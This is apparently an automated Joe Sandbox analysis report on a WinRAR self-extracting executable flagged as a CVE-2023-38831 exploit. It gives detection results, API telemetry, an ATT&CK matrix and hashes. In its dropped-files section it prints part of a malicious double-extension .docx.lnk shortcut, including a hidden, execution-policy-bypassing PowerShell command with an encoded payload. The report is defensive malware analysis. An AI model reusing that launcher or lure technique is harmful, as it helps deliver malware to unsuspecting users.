Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
oJK2UKac7G.exe

Overview

General Information

Sample name:oJK2UKac7G.exe
renamed because original name is a hash value
Original sample name:d21aa84542303ca70b59b53e9de9f092f9001f409158a9d46a5e8ce82ab60fb6.exe
Analysis ID:1522694
MD5:f708711b3c0f40e0202645136934ee1a
SHA1:6d38fa14ba708bd26ab8462258c6fa1afd7e7d97
SHA256:d21aa84542303ca70b59b53e9de9f092f9001f409158a9d46a5e8ce82ab60fb6
Tags:exeUAC-0099user-JAMESWT_MHT
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
File is packed with WinRar
Found potential string decryption / allocating functions
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious LNK Double Extension File Created
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • oJK2UKac7G.exe (PID: 2820 cmdline: "C:\Users\user\Desktop\oJK2UKac7G.exe" MD5: F708711B3C0F40E0202645136934EE1A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Suspicious LNK Double Extension File Created
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\oJK2UKac7G.exe, ProcessId: 2820, TargetFilename: C:\Users\user\Desktop\???i????-623-6341-11.docx.lnk

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: oJK2UKac7G.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: oJK2UKac7G.exeReversingLabs: Detection: 60%
Source: oJK2UKac7G.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: oJK2UKac7G.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: oJK2UKac7G.exe
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00C9BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00C9BA94
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CBC4F8 FindFirstFileExA,0_2_00CBC4F8
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CAD410 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CAD410
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CAB080 SetWindowLongW,NtdllDefWindowProc_W,0_2_00CAB080
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00C97AAF: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00C97AAF
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00C992C60_2_00C992C6
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CA7DCC0_2_00CA7DCC
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CA50010_2_00CA5001
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CA02F70_2_00CA02F7
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CB62980_2_00CB6298
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CA82430_2_00CA8243
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CA52720_2_00CA5272
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CA13F60_2_00CA13F6
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CB64C70_2_00CB64C7
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CA741E0_2_00CA741E
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CBE5F00_2_00CBE5F0
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CA55A00_2_00CA55A0
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CA07A00_2_00CA07A0
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CA889F0_2_00CA889F
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00C9D8330_2_00C9D833
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00C9395A0_2_00C9395A
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00C94A8E0_2_00C94A8E
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CBEA9E0_2_00CBEA9E
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CC2BA40_2_00CC2BA4
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00C9FCCC0_2_00C9FCCC
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00C92EB60_2_00C92EB6
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: String function: 00CAFFC0 appears 56 times
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: String function: 00CB0790 appears 31 times
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: String function: 00CAFEEC appears 42 times
Source: oJK2UKac7G.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal56.winEXE@1/1@0/0
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00C97727 GetLastError,FormatMessageW,0_2_00C97727
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CAB0BE CLSIDFromString,CoCreateInstance,0_2_00CAB0BE
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CAB6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00CAB6C2
Source: C:\Users\user\Desktop\oJK2UKac7G.exeFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_4150078Jump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCommand line argument: sfxname0_2_00CAF04C
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCommand line argument: sfxstime0_2_00CAF04C
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCommand line argument: STARTDLG0_2_00CAF04C
Source: oJK2UKac7G.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\oJK2UKac7G.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: oJK2UKac7G.exeReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\oJK2UKac7G.exeFile read: C:\Users\user\Desktop\oJK2UKac7G.exeJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: dxgidebug.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: msiso.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: mlang.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
Source: oJK2UKac7G.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: oJK2UKac7G.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: oJK2UKac7G.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: oJK2UKac7G.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: oJK2UKac7G.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: oJK2UKac7G.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: oJK2UKac7G.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: oJK2UKac7G.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: oJK2UKac7G.exe
Source: oJK2UKac7G.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: oJK2UKac7G.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: oJK2UKac7G.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: oJK2UKac7G.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: oJK2UKac7G.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\oJK2UKac7G.exeFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_4150078Jump to behavior
Source: oJK2UKac7G.exeStatic PE information: section name: .didat
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CB07E0 push ecx; ret 0_2_00CB07F3
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CAFEEC push eax; ret 0_2_00CAFF0A
Source: C:\Users\user\Desktop\oJK2UKac7G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeMemory allocated: 73A0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00C9BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00C9BA94
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CBC4F8 FindFirstFileExA,0_2_00CBC4F8
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CAD410 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CAD410
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CAF81F VirtualQuery,GetSystemInfo,0_2_00CAF81F
Source: oJK2UKac7G.exe, 00000000.00000002.2183199544.000000000BA90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\oJK2UKac7G.exeAPI call chain: ExitProcess graph end nodegraph_0-25514
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CB09FA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CB09FA
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CB91A0 mov eax, dword ptr fs:[00000030h]0_2_00CB91A0
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CBD1E0 GetProcessHeap,0_2_00CBD1E0
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CB09FA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CB09FA
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CB0B8D SetUnhandledExceptionFilter,0_2_00CB0B8D
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CB0D7A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00CB0D7A
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CB4FDF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CB4FDF
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CB0816 cpuid 0_2_00CB0816
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00CAC083
Source: C:\Users\user\Desktop\oJK2UKac7G.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00CAF04C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00CAF04C
Source: C:\Users\user\Desktop\oJK2UKac7G.exeCode function: 0_2_00C9C365 GetVersionExW,0_2_00C9C365

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
DLL Side-Loading		1
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Virtualization/Sandbox Evasion		LSASS Memory21
Security Software Discovery		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager1
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information		NTDS2
File and Directory Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing		LSA Secrets34
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
oJK2UKac7G.exe61%ReversingLabsWin32.Exploit.CVE-2023-38831
oJK2UKac7G.exe100%AviraEXP/LNK.Agent.ujrxw

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

World Map of Contacted IPs

No contacted IP infos

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1522694
Start date and time:2024-09-30 15:35:27 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 13s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:7
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:oJK2UKac7G.exe
renamed because original name is a hash value
Original Sample Name:d21aa84542303ca70b59b53e9de9f092f9001f409158a9d46a5e8ce82ab60fb6.exe
Detection:MAL
Classification:mal56.winEXE@1/1@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 119
  • Number of non-executed functions: 96
Cookbook Comments:
  • Found application associated with file extension: .exe

Warnings

  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • VT rate limit hit for: oJK2UKac7G.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\Desktop\???i????-623-6341-11.docx.lnk

Download File
Process:C:\Users\user\Desktop\oJK2UKac7G.exe
File Type:MS Windows shortcut, Item id list present, Has Description string, Has command line arguments, Icon number=0, ctime=Tue Dec 5 07:31:59 2023, mtime=Tue Dec 5 07:31:59 2023, atime=Tue Dec 5 07:31:59 2023, length=0, window=hide
Category:dropped
Size (bytes):7271
Entropy (8bit):6.070389175338264
Encrypted:false
SSDEEP:192:8WuGpe8SDQRDKx4yzWRIxPdUlDG4UteRefk82v87LnAX:IGM8BDs4BEUGWwL7LnAX
MD5:EB6BF5CE7BA1FFEDE0DC9289021CA87C
SHA1:FE47CBFDB19F09440466BC2E2F5329990288C907
SHA-256:0EEC5A7373B28A991831D9BE1E30976CEB057E5B701E732372524F1A50255C72
SHA-512:EBC08B36F05C0ABFA1F33D00BFCCB0E007E47943CCB79EE8AEFF1B471F616F16565BB9DC947527E1C7C6E94A2E29ACD53A1A65A7EC3DA7E9BBED573E0C320430
Malicious:false
Reputation:low
Preview:L..................Fe.........U.U'....U.U'....U.U'...............................P.O. .:i.....+00.../C:\.....................2..:..HG.-..windows\system32\WindowsPowershell\v1.0\powershell.exe.........HG.-.KMI....w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.s.h.e.l.l.\.v.1...0.\.p.o.w.e.r.s.h.e.l.l...e.x.e...F.......-w hidden -nop -noni -exec bypass -c $temp='UEsDBBQACAAIAIaehVcAAAAAAAAAAAAAAAALAAAAX3JlbHMvLnJlbHONjzsOwjAQRK9ibU82UCCE4qRBSGmjcADL3jhR4o9s87s9LigIoqAc7czbmap5mIXdKMTJWQ7bogRGVjo1Wc3h0p83B2jqqqNFpOyI4+QjyxEbOYwp+SNilCMZEQvnyebL4IIRKcug0Qs5C024K8s9hk8GrJmsF0FT4nB3QaFy8mrIpiLjgLWKg59116rcrX96+uezG4ZJ0ukN+lHgywEM6wpXM+sXUEsHCE+L3TymAAAAHAEAAFBLAwQUAAgACACGnoVXAAAAAAAAAAAAAAAAHAAAAHdvcmQvX3JlbHMvZG9jdW1lbnQueG1sLnJlbHOtkMsKwjAQRX8lzN6mdSEiTbsRodtSPyAm0wc2D5JU7N8bFMSKgguXw8y95zB5eVUjuaDzg9EMsiQFgloYOeiOwbE5rLZQFnmNIw/xwveD9SRGtGfQh2B3lHrRo+I+MRZ13LTGKR7i6DpquTjzDuk6TTfUvXbAspM03HUYGOhJndBFeBKrgFSSgTSirmT0amaLv1BN2w4C90ZMCnX4AKdPChD6RcSHeUT/bpH90+KBuCvQxYOLG1BLBwjc8

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.739366892065669
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:oJK2UKac7G.exe
File size:331'935 bytes
MD5:f708711b3c0f40e0202645136934ee1a
SHA1:6d38fa14ba708bd26ab8462258c6fa1afd7e7d97
SHA256:d21aa84542303ca70b59b53e9de9f092f9001f409158a9d46a5e8ce82ab60fb6
SHA512:01469c1a56b996630039fa22c410666339f6ce8aa6594c039738806295647dc4b1a51f7216c8df064ff7b24010e1f8934da30ac80ec077b4e9f7cdcac920d5a1
SSDEEP:6144:ntH/xNLaAOvIBd7lAAxWS1elIoSN6WX+t45qd:ntH5NLaAdDhAAEIFcWX+t4od
TLSH:1164B0027AC585B2D57328331A359F20A67D7C301F758EDB9394695EDE321C09B32BA7
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............w...w...w..<.V..w..<.T..w..<.U..w....Z..w.......w.......w.......w....$..w....4..w...w...v.......w.......w....X..w.......w.

File Icon

Icon Hash:1515d4d4442f2d2d

Static PE Info

General

Entrypoint:0x420780
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
